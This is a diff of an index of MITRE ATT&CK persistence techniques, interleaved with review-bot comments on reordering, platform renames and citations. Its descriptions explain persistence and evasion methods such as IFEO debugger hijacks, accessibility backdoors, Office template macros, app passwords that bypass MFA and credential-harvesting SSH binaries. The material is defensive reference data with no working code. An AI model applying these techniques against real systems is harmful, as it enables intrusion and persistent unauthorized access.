description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -34652,8 +35065,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -34684,7 +35095,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -34719,12 +35130,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -34801,7 +35210,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -34855,7 +35263,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -34887,7 +35294,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -34917,55 +35324,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
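Review bot: the roughly 40 removed lines for T1137.001 (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list) are all re-added later in the object by the `-35005` and `-35015` hunks, so the substantive change here is just `modified` moving from 2022-04-25 to 2024-10-15. Reviewers would find this easier if the generator kept a stable key order; at minimum the commit message should say the reorder is mechanical. Also visible in the unchanged context: the technique `name` ends with a stray period ("Office Template Macros."), which is not how the other names in this file are written and is worth checking against the upstream object.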
@@ -34996,6 +35358,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -35005,9 +35368,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
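Review bot: `x_mitre_platforms` for T1137.001 changes from `Windows` plus `Office 365` to `Windows` plus `Office Suite`, and `x_mitre_version` goes 1.1 to 1.2; as with the other platform renames in this diff, the per-platform indexes built from this list need regenerating in the same change. The `x_mitre_domains` and `x_mitre_platforms` keys added here are the ones removed at the top of the object in the `-34917` hunk, so only the `Office 365` to `Office Suite` rename and the version bump are real changes.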
@@ -35015,11 +35382,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
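Review bot: `x_mitre_permissions_required` (User, Administrator) is dropped from T1137.001 and not re-added anywhere in the object, so this is a genuine content change hidden inside an otherwise move-only hunk; it is consistent with the object now being a fresh 3.2.0 copy (`revoked: false`, `x_mitre_attack_spec_version: 3.2.0`, `modified` 2024-10-15), but it deserves a mention in the commit message because anything that filters tests by required permissions will stop seeing this technique. The re-added `external_references` entries are the same eight as before in a different order (`MSDN VBA in Office` now precedes `Microsoft Change Normal Template`), with no URL or description changes, so no action is needed there.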
@@ -35051,7 +35454,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -35099,13 +35502,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -35118,16 +35519,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -35139,16 +35540,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
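Review bot: T1098.005 loses `Azure AD` and `SaaS` from `x_mitre_platforms` and gains `Identity Provider`, with the version bumped 1.2 to 1.3 and Arun Seelagan (CISA) added as a contributor. Dropping `SaaS` means any SaaS-scoped index that currently lists Device Registration should lose it on regeneration; please make sure those derived files are part of this change. The description edits in the preceding hunk only rename Azure AD to Entra ID and leave the `AADInternals` citation keys untouched, which is correct since those are source names rather than product references.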
@@ -35203,7 +35604,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -35264,7 +35664,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -35340,7 +35739,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -35368,8 +35767,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests:
- name: Add macOS LoginItem using Applescript
@@ -35423,7 +35820,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -35448,23 +35845,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -35474,11 +35869,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -35489,12 +35888,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
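Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted here, between `kill_chain_phases` and `x_mitre_contributors`, while the identical line is removed from the end of the T1098.001 object in the `-35575` hunk, so that line is a move, not a change. The real additions in this hunk are the new app-password paragraph with its two citations (`Mandiant APT42 Operations 2024` and `Microsoft Entra ID App Passwords`); both are added to `external_references` in the `-35555` hunk, so the citations resolve. The earlier hunk's new `CreateLoginProfile` sentence likewise cites `Permiso Scattered Spider 2023` and `Lacework AI Resource Hijacking 2024`, both present in the `-35543` hunk.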
@@ -35503,6 +35909,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -35511,13 +35918,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
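Review bot: two data sources are added to T1098.001 (`Active Directory: Active Directory Object Creation` and `Active Directory: Active Directory Object Modification`) alongside the existing `User Account: User Account Modification`; if any detection-coverage index is built from `x_mitre_data_sources`, it should be regenerated with this change. The platform change (`Azure AD` out, `Identity Provider` in, version 2.7 to 2.8) follows the same pattern as T1078.001 and T1098.005 and has the same consequence for per-platform index files.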
@@ -35543,10 +35953,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
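Review bot: the new `Lacework AI Resource Hijacking 2024` entry puts the title before the author ("Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs."), whereas every other entry in this list is author, date, title. This is a generated file, so the fix belongs upstream rather than in a hand edit, but it is worth noting so nobody "corrects" it locally and creates a spurious diff on the next regeneration. The `Permiso Scattered Spider 2023` entry is well-formed and its single-quoted scalar is needed because the title contains a colon.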
@@ -35555,10 +35973,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -35575,14 +36003,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -35657,7 +36082,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -35746,24 +36170,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
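Review bot: the added sentence in `+ Adversaries may establish persistence though modifications to host software binaries` carries over the upstream typo "though" for "through" (the removed line had it too). If this index is regenerated from ATT&CK data the fix belongs upstream, not here, but it is worth noting so nobody treats it as a local edit. On substance the new text is the useful part of the hunk: an SSH client patched to harvest credentials, and `yum-versionlock` / `versionlock.list` used to stop the package manager from replacing the patched binary, are both concrete detection hooks, yet T1554 still carries `atomic_tests: []` further down in this patch, so nothing exercises either behaviour.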
@@ -35777,7 +36204,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -35792,6 +36219,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
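Review bot: the new citation's `description` begins with a leading space (`" Punsaen Boonyakarn, Shawn Chew, ...`) and is the only double-quoted entry in this reference list; the neighbouring entries use plain or single-quoted scalars with no leading blank. Trim the space so the rendered citation does not start with whitespace, and check the generator, since the same value will be emitted wherever the Mandiant UNC3886 citation appears.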
@@ -35805,11 +36237,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -35835,7 +36266,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -35849,7 +36279,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
